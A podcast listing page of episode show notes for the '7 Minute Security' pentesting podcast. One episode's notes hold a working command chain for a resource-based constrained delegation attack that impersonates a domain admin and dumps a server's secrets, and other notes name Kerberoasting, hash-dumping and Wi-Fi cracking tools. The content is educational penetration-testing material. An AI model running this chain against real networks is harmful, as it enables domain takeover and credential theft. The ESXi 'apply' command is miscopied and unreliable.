7 Minute Security

7 Minute Security

  • 概覽
  • 聲音
概覽
himalaya
528 聲音
7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.
查看更多
聲音
528聲音

Today we're featuring a great interview with Matthew Warner, CTO and co-founder ofBlumira. You might remember Matt from such podcasts asthis one) when Matt gave us a fountain of info on why out-of-the-box Windows logging isn't awesome, and how to get it turned up to 11! Today, we talk about a cool report that Blumira put out called2022 Blumira's State of Detection & Response, and dive into some interesting topics within it, including: How do companies like Blumira (who we rely on to stay on top of threats) keeptheirteams on top of threats? Why open source detections are a great starting point - but not a magic bullet Consider this "what if" - a C2 beacon lands on your prod file server in the middle of the work day. Do you take it down during a busy time to save/clean the box as much as possible? Or do you hope to be able to wait until the weekend and triage it on a weekend? Why annoying traffic/alerts are still worth having a conversation about. For example, if you RDP out of your environment and into Azure, that might be fine. But what about when you see an RDP connection going out to a Digital Ocean droplet? Should you care? Well, do youuseDigital Ocean for legit biz purposes? Data exfiltration - where does it sit on your priority list? How hard is it to monitor/block? Common lateral movement tools/techniques Why honeypots rule!

In today's episode, I try to get us thinking about our extended family's emergency/DR plan. Why? Because I recently had a close family member suffer a health scare, and it brought to light some questions we didn't have all the answers for: Do we have creds to log onto his computer? How about his email accounts? Do we have usernames/passwords for retirement accounts, bank accounts, etc.? For vehicles/ATVs/boats/etc. - do we have documentation about their service records? How about titles? Can we get into his phone to get key info off of text messages and grab phone #s of key contacts? What are his wishes if he were to pass? Do not resuscitate? How is the money getting handled? Cremation vs. burial? Do we haveredundancyin this plan, or is it all on paper in a file somewhere?

In today's episode we talk aboutPurple Knight, a free tool to help assess your organization's Active Directory security. I stuck Purple Knight in ourLight Pentest LITE pentest training laband did an informal compare-and-contrast of its detection capabilities versusPingCastle, which we talked about in depth inepisode #489.

Today's another fun tale of pentest pwnage - specifically focused on cracking a hash type I'd never paid much attention to before:cached domain credentials. I also learned that you can at least partially protect against this type of hash being captured by checking outthis article, which has you set the following setting in GPO: UnderComputer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security OptionssetInteractive logon: Number of previous logons to cacheto0. Be careful, as you will have login problems if a domain controller is not immediately accessible! In regards to defending against secretsdump,this articleI found this article to be super interesting.

Today we're sharing an updates toepisode #512where we ran Rapid7'sInsightIDRthrough a bunch of attacks: Active Directory enumeration viaSharpHound Password spraying throughRubeus Kerberoasting and ASREPRoasting viaRubeus Network protocol poisoning withInveigh. Looking for a free way to detect protocol poisoning? Check outCanaryPi. Hash dumping usingImpacket. I also talk about an interestingTwitter threadthat discusses the detection of hash dumping. Pass-the-hash attacks withCrackMapExec In today's episode I share some emails and conversations we had with Rapid7 about these tests and their results. I'm also thrilled to share with you the articles themselves: Getting Started with Rapid7 InsightIDR: A SIEM Tutorial Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

I'm extra psyched today, because today's episode (which is all about updating your VMWare ESXi version via command line) is complemented byvideo: https://www.youtube.com/watch?v=0-XAO32LEPY Shortly after recording this video, I foundthis awesome articlewhich walks you through a different way to tackle these updates: List all upgrade profiles: esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml Grep for just the ones you want (in my case ESXi 7.x): esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0 Apply the one you want! esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0

Well friends, it has been a while since we talked about Microsoft's awesomeLocal Administrator Password Solution- specifically, the last time wasway back in 2017! Lately I've been training some companies on how to install it by giving them a live walkthrough in ourLight Pentest LITElab, so I thought it would be a good time to write up a refreshed, down and dirty install guide. Here we go! (See the show notes for today's episode for more details!)

Hey friends, a while back inepisode #505we talked about pwning wifi PSKs and PMKIDs with Bettercap. Today I'm revisiting that with even some more fun command line kung fu to help you zero in onjustthe networks you're interested in and filter out a bunch of noisy events frombettercap in the process.

Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involvesresource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD: # From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domain\some.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN Also, on the relaying front, I foundthis blog from TrustedSecas well asthis article from LummelSecto be amazing resources. Looking for an affordable resource to help you in your pentesting efforts? Check out ourLight Pentest LITE: ebook Edition!

Hey friends, today we're giving another peek behind the curtain of what it's like to run a cybersecurity consultancy. Topics include: Setting the right communication cadence - and communication channels - with a customer during a pentest. Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here). How we're usingIntercomto publish self-help/FAQarticlesfor 7MS.

123...53
常見問題
  • Himalaya 是什麼?
    喜馬拉雅國際版,Himalaya 是一款有聲書 App,旨在為全球華人的終身學習提供隨時、隨地、隨心的全新聽書體驗。成為會員,即可以暢聽站內 100,000+ 海量會員內容。
  • Himalaya VIP 有什麼權益?
    你僅需花費每日低至 0.16 美金,就可以立即暢聽 100,000+ 全球銷量超百萬的暢銷有聲書,每週聽一本爆款新書,還有更多預售新書等著你!另可獲得每月 5 張免費體驗卡贈親友的福利,等同於贈送 1 張年卡的價值。
  • 我怎麼享受免費試用?
    現在訂閱 Himalaya VIP 即可享受至少 7 天的免費試用! 免費試用期內,無需付費即可免費暢聽會員包中的全部內容,包含 100,000+ 全球銷量超百萬的暢銷有聲書,和世界名校教授的原聲英文課程。
  • 我該怎麼使用優惠碼?
    在 Himalaya 首⻚選擇「開啟免費體驗」註冊完成之後, 輸入「優惠碼」選擇申請,支付成功後即可開啟 Himalaya VIP 內容免費暢聽權益!
  • 可以在哪收聽?
    Himalaya 提供你隨時隨地想听就听的服務, 可以下載 Himalaya APP 使用手機享受服務,同時也支持網頁版登陸在電腦上享受暢聽服務。
  • Himalaya VIP 的價格是多少?
    Himalaya VIP 採用連續訂閱的模式,按月訂閱價格為 $11.99/月;按年訂閱價格為 $59.99/年。每天僅需 0.16 美元,讓耳朵隨時隨地步入擁有 100,000+ 書籍你的專屬圖書館。
  • 我不想訂閱了,要如何取消?
    通過網頁端訂閱如何取消?
    你可以 點擊這裡 取消訂閱。 在試用期內取消訂閱,則不會自動續費;如果你已經成功續費後取消訂閱,則下個扣款週期不會自動續費。
    通過手機端訂閱如何取消?
    你可以在iTunes/Apple或Google Play設定中取消訂閱。在試用期到期前48小時取消訂閱,則不會自動續費;如果你已經成功續費後取消訂閱,則下個扣款週期不會自動續費。你可以通過以下連結找到如何取消訂閱的詳細資訊:Apple Store取消訂閱方法  Google Play取消訂閱方法

與Himalaya一起

每天15分鐘
在碎片的時間裡,學習一個知識點;通勤時、家務時、運動時,隨時隨地暢聽
每週1本新書
優選最新最熱暢銷書,資深編輯精心挑選榜單佳作,只聽有價值的好書
每年10大系列
商業財經、歷史文化、親子育兒,同系列好書好課一網打盡,帶你深入探究一個主題
app store
google play